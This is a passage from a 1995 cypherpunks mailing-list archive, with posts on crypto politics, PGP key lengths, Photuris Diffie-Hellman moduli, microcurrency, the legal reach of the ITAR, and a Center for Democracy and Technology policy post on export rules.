that all the key annoying laws (such as the Itar etc.) actually become
election issues brought into mainstream consciousness. the editorials
I have seen about the Exon amendment etc. are steps in those directions.

I've seen TCM argue on this list against this, such that we should just
give up on telling congress what is important to us etc.  it was a position
that was not unanimous, and in fact quite controversial however, and 
remarkably PM once argued against it. (heh. love the fireworks on this list.
they are quite unpredictable at times).

I'm all for replacing a dysfunctional government. but people here seem
to advocate that this happens automatically when one has certain 
technology.

there is a whole other approach to "cryptoanarchy" that no one here
has ever suggested, but which could be tremendously effective: "infiltrate"
political positions with people sympathetic to that philosophy, and work
to change the entire structure toward it. "infiltrate" is a scary word,
but IMHO nothing any different than demopublicans appointing demopublicans
to office would be going on.

a very interesting, key quote by someone here went to the effect: "if
TCM is right, nothing the government does matters. if TCM is wrong, 
nothing we do matters". a fascinating psychological justification for
a sort of nihilism. but at the root of it is a kind of laziness and
hostility to organization or groups in any form, IMHO.

in fact the libertarian extremists here seem not only to hate government,
they seem to hate the whole idea of groups accomplishing things, about
the idea of groups coming to consensus. this is a quite remarkably
cynical ideology.

I'm going to make a prediction: I think the people who are interested
in organizing the "cyberspace coalition" are starting to come together
right now, and that over the long run, this entity will be far more
beneficial in advancing a better reality through cyberspatial technology
than all the people who advocate disillusion, antagonism, resentment, 
and nonparticipation in groups and government, to the point the latter 
approach will be generally discredited. in other words, we have a powerful 
system that can be changed from the inside instead of abandoning it. at the 
moment, I've not seen any proof that a dedicated group couldn't reform it from
the inside, only a lot of cynical conventional wisdom that such a thing
is inherently impossible and useless to try.

the comment I quoted displays the conventional wisdom on this list, 
that the encryption issue is "us vs. them", "people vs. the government",
etc.  what would A.Nonymous say if someone who was elected began to 
embrace the position that encryption is a right? I'm sure he would find
some new reason to be disillusioned with government. that's the position
of radical libertarians. no matter what form government takes, no matter
who is driving it, they hate it. 

the first lesson for radical libertarians bordering on anarchists 
that love this list is not that Oppressive Government is  the problem, but 
that Government Is Always Bogus. a rather infantile philosophy that reminds
me of the way children defy authority or structure merely because it
is an authority or a structure, not because of any particular disagreements
they have with the underlying philosophy it expresses. (or rather, they
manufacture the disagreement with the philosophy as required, such that
the reasoning is, if an authority stands for [x], then I am against [x], and
against that authority).

and this is precisely the dysfunctional
philosophy to life I am referring to that I think will be discredited in 
the long run as intellectually vacuous and actual counterproductive to
any kind of progress.

from what I have seen of Gingrich, he might be a potential leader of this
kind of "computer coalition". he is the congressman who has taken stands
on encryption issues and other key cyberspace issues that seem to suggest
an internal awareness of constitutional rights superseding momentarily-
politically-fashionable government legislative whims. of course I'm
putting on my flameproof longjohns as I say that. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 10 Nov 1995 05:56:29 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: PGP Comment feature weakens remailer security
In-Reply-To: <199511091413.JAA15288@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951109151948.23203B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Nov 1995, Perry E. Metzger wrote:

> > I agree entirely. That's why my PGP key at school is 382 bits. It's a
> > lot easier to compromise my machine than factor a 382 bit number.
> 
> On the other hand, it costs nothing by most people's standards to use
> a 1024 bit key, so why not use one? I find that there is only a point
> in using low security for anything in particular when there is a
> perceivable cost to it -- if the cost is typing a different number
> while doing key generation, I don't see why one should suffer the
> tradeoff.

Actually, it makes a sort of sense; if I see a 384 bit PGP key, it 
strikes me as insecure, and I really consider it; unless it says so on 
the 1024 bit key, I wouldn't think about it much.  It's useful as a human 
identifier, assuming it's not the weakest link in the chain.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Thu, 9 Nov 1995 23:11:36 +0800
To: karn@qualcomm.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511090337.TAA04357@servo.qualcomm.com>
Message-ID: <m0tDYGN-0002e9C@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Phil" == Phil Karn <karn@qualcomm.com> writes:

    Phil> as options. There's a 2048 bit optional modulus and may even
    Phil> be a 4096-bit option if I can find one in reasonable
    Phil> time. There was going to be a 512-bit optional modulus but

I'd like to see the 4096 bit modulus. Let me know if I can help you by
donating computation power. We have a SGI Onyx with 4 processors and
several smaller SGI computers.

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMKIUdEyjTSyISdw9AQGEawP9FUG9X5t8n/w0BRcWVTPv6LeERgY78WHc
mBNG4ScvbRZK6o4ZoQuEr10v4eDqKQtHD3lkdV5HJO2+oBrNkLOLKyVR8sr0Yh+3
wKyOeF8BUKqwILteJGT8UQnznFnHha0m9HxlHOIUrx6SOGIMc6t6N4DFCRzOis0h
dc0pgYN2S/Y=
=QKwE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 10 Nov 1995 08:33:41 +0800
To: cypherpunks@toad.com
Subject: the revolution of microcurrency
Message-ID: <199511092347.PAA22507@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



the topic of "microcurrency" has come up on this list before and
is reappearing with considerations being given to small charges
for Web pages. I've been thinking about this a bit and thought I'd
share some interesting ideas. (YMMV!!)

1st, there was a really excellent article on microcurrency in the
Economist I believe that was really touting it as a revolutionary
change in the economy. I agree with this wholeheartedly. the possibility
that people can

- exchange extremely small amounts of cash without the cost of overhead 
- and virtually instaneously, 
- over large geographical distances, 
- potentially even seamlessly with regard to different currency exchanges, 
- and a large infrastructure exists to distribute intellectual property for 
  free,
- (possibly invisibly to governments)

will all contribute to a REVOLUTIONARY effect on culture.

my key idea on all of this is that the whole idea of copyright
is going to melt when you introduce cash, not be strengthened. there
are a lot of people out there who think that one has to try to put
a lock and chain on web pages or whatever that one is "selling", 
and the horrible problem of the net is that anything can be copied.
and these people are feverishly working on specious "solutions" to this 
"problem" right now.

WRONG!!

this is precisely the view from the old ideology that says, "you
have to protect what you are selling from other people or you 
won't make any money". this theme will increasingly be discredited in 
the cyberspace world, which works inherently differently in a 
remarkable manner.

I submit that things like the release of public domain standards
and products like Java and Netscape for free are not merely blips at this 
moment but increasingly are going to be the marketing plan of the future. the
idea is that you give away your product for FREE, and then people
pay you if they like it. this new ideology will be relevant to 
products that are not "things" but in fact are more in the realm of
intellectual property, i.e. writing, software, cyberspace web pages, etc.

the beauty of this system is that NO LONGER is "unauthorized" 
distribution" the "enemy". it is your FRIEND, a key aspect of profit!!
the company that doesn't think in terms of this new ideology will 
try to control the distribution of their product. they will set up
draconian systems that try to restrict the flow of the product
to "authorized users". (i.e. those who pay in advance). our entire
society thinks within this paradigm, including the government, which
is makes noises about ways to restrict copying on the internet by 
introduction of actual physical safeguards. NOPE!!

a rather extraordinary new economy can replace this, that of voluntary
payment. widespread distribution becomes your FRIEND. you DISDAIN
things like copyright, because they prevent your "product" from reaching
the eyes of potential customers. your goal is actually to distribute
the product as far as possible, in a sort of pyramid-like scheme.
you want your "customers" to distribute your product to their friends,
so that those "friends" potentially become customers in an endless
cycle.

this approach works amazingly with writing. imagine that if John Markoff
suddenly QUIT the NYT and just wrote articles on his own. and imagine
that at the bottom, you see a message, "for more of the same, send
.5c or more to markoff@liberated.com". I submit that in the future, 
Markoff will probably be able to make more money than he does at NYT,
because he is eliminating the middleman. the newspaper company is 
primarily built as a *distribution* channel. suddenly he doesn't have
to pay anything out of his own salary, so to speak, for distribution.
distribution is *free*. he doesn't require anyone else to do it for him.
he puts his article in an apropriate place on the net and it circulates
like a VIRUS if it is well received. the more people that see the article,
the more people that pay him money.

in an information system, individual objects have no value. what has value
is the FLOW of quality information. if Markoff continues to flow with that
good information, people will continue to pay for it. they will perceive
that "by paying him, the quality information flow from him to me continues
or increases".

this same idea works with software. you don't see software as an end
product. you see it as something that is evolving over time. and whenever
you send money to a company for software, in this new system the idea
is that "I like this software, and I want to see it grow. here is my
contribution to that".

another interesting area is that of patents, and I see this dissolving
in the same way. a patent is like trying to put a lock on an idea. but
gradually people will realize, only ideas that are implemented have
any value. you can't profit and lock an idea at the same time. 
*dissemination* of ideas is what leads to profit, not locking them up.

hence there will be an economic incentive to an inventor to give away
his ideas for free, at first. in the old system, where one thinks of an idea 
as a "thing", this sounds preposterous. but in a new culture where ideas
are seen as things that need to be cultivated and grown to work, it will
seem eminently sensible. the inventor is releasing his idea to the world,
saying "I can expand on this idea, even turn it into a reality, if
you send me money". other people can of course steal the idea, but there
is no value in the idea itself: the value is in the development of it
into evolved new states, or the intellectual expertise of the inventor.

in short, microcurrency could have quite a liberating and revolutionary
effect on economics as we know it. in the current system, people are not
paid for tiny contributions to the whole. the contributions have to be
"packaged up" into something like a magazine before individuals can get
any profit. a new system may allow people to be compensated directly
for things that are hard to quantify.

 how much was Markoff's last article
worth in the NYT? that's impossible to figure out. but if you had a 
microcurrency, you can calculate exactly how much money people sent to 
Markoff for his last article. say, across the world, it totalled $843.16.
such a sum is not inconceivable. and over time it would be enough for
him to make a salary over the whole year on, perhaps!! I'm arguing that
this is increasingly going to become VIABLE over the next few years
with cyberspace and microcurrency.

the beauty of this system is that this increased granularity filters
down to individual pieces such as a single piece of writing, a single
software program, single contributions by individual people that can
be rewarded tangibly. that's all that currency is, in its most basic
form: a system whereby members of a society say to each other, 
"please continue to do that for me, do more of it, and do it even better--
because I value it *this* much!!"

there is a lot of ink in the press lately about the Netscape/Java
assault on the Microsoft bastion. I think there is something more
important conceptually going on at a lower level. Microsoft has never
released a product for free to the world. they are still in the old
paradigm, "you have to control something to prosper". they are at
this minute coming out with a PROPRIETARY (read: "you have to lock something
to profit from it") alternative to Java. Netscape understands the contrary
philosophy BEAUTIFULLY. you write the software, and DISTRIBUTE IT FOR FREE.
same with Java: you create OPEN STANDARDS. these companies don't fully
understand what direction they are going in (notice how they are only
committing to the idea of free software or standards "from the start", but
not afterwards), but I think they are the precursors to a radically 
transformed economic system based on cyberspace microcurrency. 

the microcurrency situation can even be set up in a company. "whoever
codes this computer problem will receive [x] dollars from the company".
the whole economic system becomes a fluid, pulsing entity that filters
down to the tiniest fraction of value and gives each individual a 
quantitative value on his contribution. companies talk about "incentive
systems" today, but perhaps the entire economy will become an enormous
incentive system in this way in the future!!

in this system, ultimately, I think the whole concept that someone "buys a 
product" will dissolve into the idea that "one rewards intellectual
productivity to bring more of the same". it's as fundamental and 
intuitive as the difference between atoms and bits.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@prufrocks.scranton.com>
Date: Fri, 10 Nov 1995 06:15:56 +0800
To: Dan Weinstein <djw@pdcorp.com>
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <199511080054.QAA29419@email.pdcorp.com>
Message-ID: <Pine.LNX.3.91.951109163123.5118A-100000@prufrocks.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


   Where can one get a copy of ITAR ? Secondly , has anyone written any 
books on the subject and if so who and what?

                    Thanks in advance,

                       Deirdre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 10 Nov 1995 07:56:00 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <m0tDf8g-0004LGC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



In our recent correspondence on this list with the heading ``Re:
Exporting software doesn't mean exporting'', Michael Froomkin and I
seem to have two different areas of disagreement:  (i) whether the
ITAR's provisions relating to cryptographic software apply to foreign
persons who disclose (or transmit) cryptographic software to another
foreign person without the United States and (ii) whether there is a
separation of powers (or ultra vires) argument that can be made
against the application of those provisions to anyone, foreign or
estados-unidian, in the United States or abroad.

In this message I will limit myself to the first area of disagreement
and will try to deal with the second area in a later message.

As I tried to say, somewhat clumsily, before, and may have caused some
confusion in doing so, there are so many reasons why the provisions of
the ITAR relating to cryptographic software are unconstitutional and
so even more reasons why those provisions are unenforceable, that I
find it difficult to discuss whether those unenforceable and
unconstitutional provisions can be enforced against a foreign person
who discloses software to another person outside of the United States.
I am, after all, firmly convinced that those provisions cannot be
enforced against him, because I do not believe that those provisions
can be enforced against anyone.  (Though in some ways a foreign person
outside the United States is more vulnerable than a United States
person or a foreign person within the United States, since the outside
foreign person has (arguably) less constitutional protections.)

When I said

  (But of course the ITAR as applied to cryptographic software--and that
  is all that I am talking about--are so unconstitutional in so many
  different ways that nothing is going to turn on that one issue.)

the one issue that I was referring to was the status of outside
foreign persons and, of course, that is not the issue that ``is now in
front of two district judges.''  (I hope that the issue before the two
federal district judges is the issue of the constitutionality of the
ITAR's provisions relating to cryptographic software, but both cases
raise relatively narrow factual issues and may end up being resolved
(if one dares call such a result a resolution) on the grounds that the
issues are not appealable under the Administrative Procedure Act or
that administrative remedies were not exhausted or even that the the
provisions of the ITAR in question are unconstitutional but that that
determination that is good for that day and that train only.)

Now Mr. Froomkin says:

  In short, in this particular case the ACEA, and by extention the
  ITAR, doesn't "say what it says" it "says what it must mean".

(And I dare him to make that assertion in the faculty lounge at Miami
when some of the more critical and analytically inclined members of
the Miami law faculty are present.)  I would take this as an admission
that the ACEA and the ITAR does say what it says (even if it must mean
something else) were it not for the fact that--and this was my ``ultra
vires'' point--that the ACEA doesn't say it.

(In discussing the quoted passage I am assuming that ``extention''
must mean ``extension'' and that it is not used as the opposite of
``intention'', if only because I don't know what the latter would be.
But on the other hand the only dictionaries I have to hand are the COD
and the on-line version of Webster's Collegiate.)

The AECA doesn't contain any definition of ``export'' whatsoever; the
whole issue that we are discussing turns on the interpretation of what
the ITAR says when it defines ``export'' as including:

  Disclosing (including oral or visual disclosure) or transferring
  technical data to a foreign person, whether in the United States or
  abroad ....

Now Mr. Froomkin seems to be contending that this language must be
interpreted as it would be interpreted by some sort of neo-Platonic
court (probably sitting in Rawl's original position by designation),
which he calls ``any court''.  The contention is:

  any court construing the ACEA would inevitably read the prohibition
  on "exporting" to a foreign person as not applying where the nation
  lacks jurisdiction.  

Now it was my argument--which Mr. Froomkin helpfully calls an ``ultra
vires'' argument--that any court reading the ACEA would notice (i)
that there is no language in that act defining ``export'' and (ii)
that ``export'' does not mean disclosing, or even transferring,
information (which is what cryptographic software is) and (iii) that,
in consequence, the Office of Defense Trade Controls exceeded its
congressionally granted authority, and therefore its constitutional
authority, when it came up with the perverse provision that is at
issue here.  But that is the subject of my other, as yet unwritten,
message.

Now I take it that Mr. Froomkin's contention turns on the claim that
Congress lacks jurisdiction under international law to pass a
statute--or authorize a regulation--that makes it a crime for a
foreign person to transmit something to another person when both of
them are outside the United States.  So as to avoid the other
constitutional and ultra vires and so on issues, let us assume that
Congress were to amend the ACEA to make it a crime ``to transfer a
cryptographic device to a foreign person within the United States or
abroad without first obtaining a license or a waiver of jurisdiction
from the Office of Defense Trade Controls.''

And now assume that someone, F, who is a foreign person and who has
never been in the United States transfers a cryptographic device that
was not made in the United States or by a United States company to
another foreign person who person who has never been in the United
States.  And now assume that F does come to the United States on a
holiday and that he is arrested and indicted for violating the AECA in
that he did transfer a cryptographic device to a foreign person.

The first thing to notice is that the indictment is not defective.
The only defense--since it is the only one that we are interested in
and we control the hypothetical--is: ``but that was in a foreign
country'' and therefore the United States has no jurisdiction under
international law (or under something) to treat F's actions as a
crime.

So the defense moves to dismiss the indict on those grounds.  And the
prosecution stipulates that the acts charged occured in a foreign
country, that F is a foreign person, etc.

On those facts I would hope that the court would construe the statute
as not covering F's actions outside the United States and would dismiss
the indictment, but--considering that the statute specifically says it
applies both within the United States and ``abroad''--I am not nearly
as sanguine as Mr. Froomkin is.  But let us assume that the indictment
is dismissed.

And now the hypothetical provision in the ACEA is again amended by
congress to make it a crime ``for (i) a United States citizen to
transfer a cryptographic device to a foreign person within the United
States or abroad or (ii) a foreign person to transfer a cryptographic
device to a foreign person within the United States or abroad, without
in either case first obtaining a license or a waiver of jurisdiction
from the Office of Defense Trade Controls.''


And now assume that F', who has never been in the United States
transfers a cryptographic device to a foreign person and thereafter
comes to the United States and is arrested indicted for violating the
hypothetical provision of the ACEA.  It would seem to me that there is
no way that any but the most willfully wrong-headed court (and there
are, I admit, such courts) would construe the hypothetical provision
as not covering F's actions, since it does so clearly cover those
actions.  I mean that there is no way that the court can get away with
concluding that it does not mean what it says.

So what can F' do now?  Well, he could try to raise the claim that the
lack of ``jurisdiction''--which is the justification for Mr. Froomkin's
``any court'' construing the ITAR's actual provisions would not apply
to F or F'--is a ground for dismissing the indictment.

But how can he raise that point?  He can't very well deny that the
court has jurisdiction over his person--he's sitting in the court with
shackels on--and he can't get away with claiming that the court
doesn't have jurisdiction to try him for violating the ACEA.

So it would seem that F's only hope would be to move to dismiss the
indictment on the ground that to continue the prosecution would be to
deny him due process because the United States lacks jurisdiction
under international law.

Now I am no expert in this area, but I would be surprised if the
courts would recognize this as costitutional defense.  As I understand
it from talking with somebody here at CWRU who is knowledgeable, the
courts of the United States tend to defer in such cases to Congress
and the executive--when they are in agreement, as they would be in our
hypothetical--and principles of international law count for little.

So F' will ``inevitably''--to use Mr. Froomkin's word--be convicted of
the crime of delivering a cryptographic device to a foreign person
outside of the United States.

Now lets get back to the ITAR as it is actually written.  In an actual
criminal action brought against a foreign person who is accused of
disclosing cryptographic information to a foreigner outside the United
States--not that I think such an action will ever actually be
brought--the government can point out to the court the facts that I
have just discussed, so the court will be aware that there is no
constitutional provision requiring the dismissal the indictment, even
if the indictment is contrary to international law.  And a real court,
as opposed to Mr. Froomkin's ``any court'' might in those
circumstances feel free to determine that the ITAR means what it says.
(That's just common sense.)

And, were the government ever to bring such a case it, it would argue,
and I think that it would convince a lot of real judges, that the
criminal action does not violate international law because the United
States is protecting its own economic interests by prosecuting foreign
persons who disclose cryptographic information to other foreign
persons outside the United States.  The government's lawyer will
argue:

  Judge, the United States is in a real bind.  It is absolutely
  necessary for our national security that we forbid the export of
  cryptographic software.  But, on the other hand, as those
  Cryptopunks keep pointing out, we are distroying our computer
  industry by enforcing the ITAR against American companies.  So the
  only solution is to apply the ITAR against foreigners as well so
  that the American computer industry will have a levelled--I mean a
  level--field to play upon.  And the anti-trust cases make it
  absolutely clear that the United States does have jurisdiction to
  enforce its laws against foreign  criminal who break those laws
  outside of the United States when their crimes have a negative
  effect upon the economy of the United States.

I am afraid that most federal district court judges would buy that
argument, and I am not even sure that Mr. Froomkin's ``any court''
wouldn't buy it. 

And, in any case, if such a criminal case were to be brought, the
government would almost certainly be able to allege additional facts
to help justify the claim that the US does have jurisdiction over the
matter under international law.

For example, the defendant might be French, and the French government
might be cheering the United States government on.  If the crime is a
crime under both French law and the law of the United States then
there is going to be no problem with the United States asserting
jurisdiction.  (That is, if I understand it correctly, Mr. Froomkin's
murder example.)

Or the defendant may have studied cryptography in the United States,
before he returned home and disclosed the information.

Or the information that he disclosed had previously been unlawfully
exported from the United States in violation of the ITAR (PGP, for
example).

Or the foreign person is an employee of a United States company or a
foreign company doing business in the United States.

Or even that the disclosure was done by a message transmitted over the
Internet that happened to be routed through the United States.

But the matter is even more simple than that since the government is
not going to bring those criminal charges against a foreign person or
a United States person or anyone else if they can possibly avoid it.
The ITAR's provisions on cryptographic software are used by the
government to spread fear, uncertainty, and doubt, and to discourage
the spread of strong cryptography.  Since an actual criminal case
would almost certainly result in at least significant parts of those
provisions being held unconstitutional, the government is not going to
bring such a case if it can find any other ways of satisfying its
goal.

And looked at that way, our foreign person who discloses cryptographic
software to one or more other foreign persons abroad is going to be
the perfect fall guy.  As I have suggested before, the government will
simply bar him from getting a visa to enter the United States since
violation of United States foreign trade regulations is a ground for
denying a visa--at least an immigrants visa.  And, despite Mr.
Froomkin's claim that our foreign person would have a cause of action
if his ``petition'' were denied, he would probably have no recourse
whatsoever.  Certainly he would have no claim that the United States
has no jurisdiction to exclude him for acts done by him outside the
United States; the United States has jurisdiction to exclude
foreigners for things that the foreigners did outside the United
States, like believing in polygamy.  And a foreign person outside the
United States may not have standing to complain of violations of his
freedom of speech outside the United States in an American court.

But let us assume, contra-factually that Mr. Froomkin is right, and
that the poor, excluded foreign person would have a good cause of
action to force the government to give him a visa.  (Though I really
am curious as to what that action would be.)  That cause of action is
going to cost tens of thousands of dollars to pursue, and it will take
years before it is resolved in favour of our foreign person, who will
be excluded--or sitting in jail with a bunch of Cuban and Chinese
refugees--until the case is resolved in his failure.

I am sorry to have written such a long message, and to have been so
slow in writing it, but I think that part of the problem is that both
Mr. Froomkin and I were shooting from the hip, and that is why our
disagreement grew.

But perhaps it has all been worthwhile, for I do think that there are
a few useful conclusions that can be drawn from this discussion:

  (i) We academic lawyers tend to try to settle real world questions
  as if they were academic questions;

  (ii) It is never safe to assume that any court will construe a
  statute or a regulation as meaning something other than what it
  says; 

  (iii) One can only construe a legal text in a particular context;
  even if one thinks that one can figure out how any court would
  interpret the text in qustion, one still nees to know how the text
  got before the court; and

  (iv) The fact that you can always sue the police for unconstitutional
  harassment isn't of much help when they reach for the rubber hose.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 11 Nov 1995 06:46:33 +0800
To: cypherpunks@toad.com
Subject: Re: "Industry Group Rebuffs U.S. on Encryption"
Message-ID: <199511091637.RAA06491@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


At 1:14 AM 11/9/95, Bill Stewart wrote:

 <deletia>
| The fact that Netscape is including
| secure email in their Navigator next release can be a big lever pushing the
| Feds toward giving up, and perhaps deserves some publicity once the 
| release version is out the door.

Giving up on what? On doing everything within its power to keep the world
beyond itself strong-cypto-free? Not likely.

In only a few decades, crypto's gone from being unheard of to the object
of an increasingly high-profile PR war over "domestic and international
terrorists and criminals." The govt's position, however, hasn't changed
substantially: it doesn't like crypto, and it never will. There will never
be a time when the cops who pull you over or drop by for a visit will say,
"Ma'am, if you've encrypted that, we respect the fact that you don't want
anyone to see that--so we'll just be going bow. You have a nice day, now,
y'hear." And there will never be no cops.

The gov't may well lose this fight eventually, but a few heads are gonna
get broken before either side wins. This fight is playing itself out on
the level of policy now, but it's much bigger than a policy issue. And the
"revolution" of Newt and his legions of weenies (I say nothing of Clinton
and his legions of weenies) is bullshit: he's an empty opportunist who's
riding a fractious coalition that'll make Clinton look like a libertarian
if it ever gets control of the country. And right now he's cluing in to
the fact that he can score some points on encryption issues: he's got his
eye on the snowballing WiReD coalition, which *no one* knew existed until
a few years ago.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 10 Nov 1995 10:25:29 +0800
To: cypherpunks@toad.com
Subject: Re: Market Value of Web Pages
Message-ID: <199511100140.RAA09572@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 13:28 11/9/95 -0800, Timothy C. May wrote:
>With all due respect to Bill--his mention of agorics tells me he knows
>something about computational ecologies and markets--, there is no
>reasonable way to say what price is "closer to the current market value of
>the page content," except by what the market will bear!

Tim is absolutely correct that the market determines the current market
value.  I mentioned some low value items in the current market and he
mentioned some high value ones.

However, there is not really a problem in paying for high valued web pages
(like the $400/photo consultant report he mentions).  The various network
payment schemes that have been proposed and implemented will handle these
quite adaquatly.

What concerns me is building systems that can support low-cost high-volume
markets.  If I have to pay a penny/page, I am going to ask whether Netscape
can use a whole gigabyte disk for its cache and have basically a pay/copy
system.  If the cost is low enough, I will pay/view and avoid stale data in
the cache problems.  However, there are very few systems where the
transaction costs are low enough to support low-cost high-volume markets.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Fri, 10 Nov 1995 10:36:08 +0800
To: stewarts@ix.netcom.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511090913.BAA08368@ix.ix.netcom.com>
Message-ID: <199511100142.RAA13467@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>If speed is really a concern, you could do a 640 or 768 bit modulus

Hilarie suggested exactly this in private mail, and I've agreed. I'm
going to generate a 768-bit optional modulus.

Bill has also suggested a killer 4096-bit modulus for the truly
paranoid. Not sure my poor 32MB P90 can handle that without thrashing
its guts out, but I'll give it a try.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (editor@cdt.org)
Date: Fri, 10 Nov 1995 08:48:18 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post No. 29 - Coalition Says New Crypto Policy Flawed
Message-ID: <v02130505acc847b81d63@[204.157.127.4]>
MIME-Version: 1.0
Content-Type: text/plain


Pardon the massive mailing (I have never posted a full Policy Post to this
list before), but I thought a majority of you would find this interesting
and relevant.

Jonah
(editor@cdt.org)

------------------------------------------------------------------------
   ******    ********    *************
  ********   *********   *************
  **         **      **       ***               POLICY POST
  **         **      **       ***
  **         **      **       ***               November 9, 1995
  **         **      **       ***               Number 29
  ********   *********        ***
   ******    ********         ***

  CENTER FOR DEMOCRACY AND TECHNOLOGY
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST Number 29                      November 9, 1995

CONTENTS: (1) Public Interest/Industry Coalition Says Administration Crypto
              Policy Flawed -- Pledges to Develop Alternative
          (2) Text of CDT-led coalition letter to Vice President Gore
          (3) How To Subscribe To The CDT Policy Post Distribution List
          (4) About CDT, Contacting Us

This document may be re-distributed freely provided it remains in its
entirety. Excerpts may be re-posted by permission (editor@cdt.org)
-------------------------------------------------------------------------

(1) Public Interest/Industry Coalition Says Administration Crypto Policy
    Flawed -- Pledges to Develop Alternative

A broad coalition of nearly forty public-interest organizations, trade
associations, and representatives from the telecommunications and computer
hardware and software industries sent the attached letter to Vice President
Albert Gore on Wednesday, objecting to the Administration's recently
announced cryptography policy.

While the letter praised the administration for its efforts to develop a
national cryptography policy, the signatories, which include groups such as
EFF and companies such as America Online, Apple, AT&T, MCI, Lotus,
Microsoft, and Tandem Computer (organized by CDT), expressed concern that
the Administration's proposal is weighed heavily in favor of law
enforcement and national security while neglecting the privacy and security
needs of individuals and the marketplace.

The letter states:

 "A secure, private, and trusted Global Information Infrastructure
  (GII) is essential to promote economic growth and meet the needs of
  the Information Age society.  Competitive businesses need cryptography
  to protect proprietary information as it flows across increasingly
  vulnerable global networks. Individuals require privacy protection in
  order to build the confidence necessary to use the GII for personal and
  financial transactions... The undersigned groups recognize that
  the Administration's recently articulated cryptography initiative was a
  serious attempt to meet some of these challenges, but the proposed
  initiative is no substitute for a comprehensive national cryptography
  policy.  To the extent that the current policy becomes a substitute for
  a more comprehensive policy, the initiative actually risks hindering
  the development of a secure and trusted GII."

The coalition pledged to work together to formulate recommendations for an
alternative cryptography policy based on the following principals:

* ROBUST SECURITY:  access to levels of encryption sufficient to address
  domestic and international security threats, especially as advances in
  computing power make currently deployed cryptography systems less
  secure.

* INTERNATIONAL INTEROPERABILITY:  the ability to securely interact
  worldwide.

* VOLUNTARY USE: freedom for users to choose encryption solutions,
  developed in the marketplace, that meet their particular needs.

* ACCEPTANCE BY THE MARKETPLACE: commercial viability and ability to
  meet the expressed needs of cryptography users.

* CONSTITUTIONAL PRIVACY PROTECTIONS: safeguards to ensure basic Fourth
  Amendment privacy protection and regulation of searches, seizures, and
  interceptions.

* RESPECT FOR THE LEGITIMATE NEEDS OF LAW ENFORCEMENT and national
  security, while recognizing the reality that determined criminals will
  have access to virtually unbreakable encryption.

A second group, composed of conservative/libertarian organizations
including Americans for Tax Reform and Citizens for A Sound Economy, issued
a similar letter on Wednesday to House Speaker Newt Gingrich. The text of
that letter, as well as additional information on the cryptography policy
debate, can be found on CDT's Cryptography Issues Page:

        URL:http://www.cdt.org/crypto.html

The letters come as the National Institute of Standards & Technology (NIST)
this week announced revisions to the Administration's proposed export
criteria announced last September (See CDT Policy Post No. 24). The revised
proposal is substantively similar to the previous version, and maintains
controversial provisions including:

* LIMITS ON KEY LENGTH: The revised proposal would continue to only
  allow the export of cryptography systems with 64 bit key lengths, but
  only if the keys are escrowed by an agent approved by the U.S.
  Government and if the systems meet the other export criteria.

* RESTRICTED INTEROPERABILITY: While the revised proposal does clarify
  the interoperability provision,  it would continue to prohibit
  exportable products from operating with any other cryptographic
  products that do not meet the NIST criteria.

* NO PRIVACY SAFEGUARDS: The proposal contains no mention of the
  procedures for law enforcement access to escrowed keys, the standards
  for certifying escrow agents, or the obligations on escrow agents to
  protect privacy.

CDT believes that the NIST proposals fall far short of the promise for a
more sensible and comprehensive cryptography policy outlined last July in
Vice President Gore's letter to Rep. Maria Cantwell.  The current proposal
fails to provide adequate security, protect the privacy of individuals, and
meet the needs of the global marketplace. CDT believes that a more
comprehensive approach to cryptography policy is necessary to address both
the immediate need for strong cryptographic applications and the long-term
development of a secure and trusted Global Information Infrastructure. CDT
will work with the signatories of the letter to over the next six months to
develop an alternative to the Administration's proposal.

